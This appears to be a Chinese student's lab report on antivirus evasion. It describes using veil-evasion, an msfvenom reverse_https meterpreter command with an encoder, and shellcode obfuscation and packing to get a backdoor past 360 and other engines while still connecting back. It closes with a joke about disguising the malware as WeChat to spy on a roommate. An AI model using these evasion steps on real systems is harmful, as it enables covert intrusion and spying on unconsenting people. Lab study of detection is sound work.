20154324 刘康权 Exp3 免杀原理与实践

一、实践目标与内容

1.实践内容

  • 利用多种工具实现实现恶意代码免杀
  • 在另一台电脑上,杀软开启的情况下,实现运行后门程序并回连成功

2.实践目标

  • 在保证后门程序功能的情况下实现杀软共生,(即使以后不能为所欲为)也要保证自己电脑安全

二、实践过程与步骤

1.使用msf编码器生成的后门程序

也就是上次实践生成的后门程序,通过检测非常的惨,直接被国内第一杀毒软件360杀掉了,在virscan网站扫描,也有20个杀毒引擎识别了出来,裸奔的后门程序还是很容易被辨识出来的。

2.使用veil-evasion生成的后门程序

2.1Kali上面没有veil这个平台,首先安装这个平台

apt-get install veil-evasion

2.2根据菜单选择一个模板生成,在这里我选择的是evasion里的c语言中的一个

2.3设置相关参数即LHOST,LPORT后输入general就会生成


2.4找到生成的程序拷贝到win7虚拟机后,没有被360查出来,virscan扫描有7个杀毒引擎识别了出来,可以veil-evasion的模板还是强的,但还是有不少引擎能识别出来

**tip:找不到生成的程序,可以在本地电脑搜索veil,找到var/lib下的veil,打开output->compiled,就可以找到啦 **

3.shellcode编程

3.1在Kali里生成一个C语言格式的shellcode

msfvenom -p windows/meterpreter/reverse_https -e x86/bloxor LHOST=192.168.211.133 -f c

3.2创建一个c文件,并进行编写,在linux环境下编译

3.3拷贝至win7,能直接被360识别出来,virscan扫描有6个引擎可以识别出来且能回连成功




**tip:我尝试对shellcode进行倒序,换位,异或,但是在Kali环境下进行编译一直会被360识别出来,virscan扫描结果也基本没变 **

3.4拷贝c文件代码,在win10环境下,在codeblock进行编译,不会被360识别出来,virscan也只有3个引擎能识别出来

3.5即使在win10环境下进行编译,也还有3个引擎能识别出来,于是我对代码进行了改进,经过倒序,移位,异或后,它终于只能被......2个引擎识别了,且拷贝至win7环境能够运行,也能够回连。

  • 无论怎么改进,还是有两个引擎能识别出来,于是我对两个引擎进行了研究。
  • 其中GData引擎是实时更新的病毒库,所以我猜想是他成功记录下了c语言编译shellcode的特征,而另外一个是F-PORT,虽然它的病毒库是2016年更新的了,但我猜想它应该记录下了通过windows环境下编译shellcode的特征,因为我通过查看它的识别记录,发现它基本都识别出了我们是实验中的程序(哈哈,其中还有一个叫刺激战场的exe)



4.对程序进行加壳

  • 实际并没有什么用,加壳后能识别出来的引擎数基本没变甚至还会变多
  • 我认为是杀毒引擎记录下了壳的特征,所以识别数甚至会变多

加壳前:

加壳后:

三、基础问题回答

1.杀软是如何检测出恶意代码的?

  • (1)我认为现在的杀软主要是基于特征码进行检测的,特征码就是一段或多段数据,如果一个可执行文件包含这样的数据则被认为是恶意代码。
    (2)还有就是启发式恶意软件检测,就是根据些片面特征去推断。
    (3)还有就是基于行为的恶意软件检测,就是通用的、多特征的、非精确的扫描。

2.免杀是做什么?

  • 我认为免杀就是使杀毒软件检测不出恶意软件。

3.免杀的基本方法有哪些?

  • (1)通过多种方式改变特征码,例如加壳,生成shellcod,用其他语言进行重写再编译等等。
    (2)改变行为,例如改变通讯方式(使用反弹式连接)和操作模式(加入混淆作用的正常功能代码)。

四、离实战还缺些什么技术或步骤?

  • 还缺少将程序直接放进目标的手段,放进去以后还要它能够自己运行,毕竟很多人还是不会去运行陌生软件。

五、实践总结与体会

  • 通过这次实践,我们实现了恶意软件的免杀,而且这个过程也不是很复杂,不禁让我有了那么一丝恐惧,我的电脑里是不是也有不少这样的恶意软件,一定要抽个时间好好检查检查,还让我有了一丝兴奋,一旦把恶意软件伪装成微信,拷到我室友电脑里,等他一运行,他的秘密将无处可藏,哈哈哈哈(别提醒他)。
posted @ 2018-04-07 15:01  20154324  阅读(252)  评论(0编辑  收藏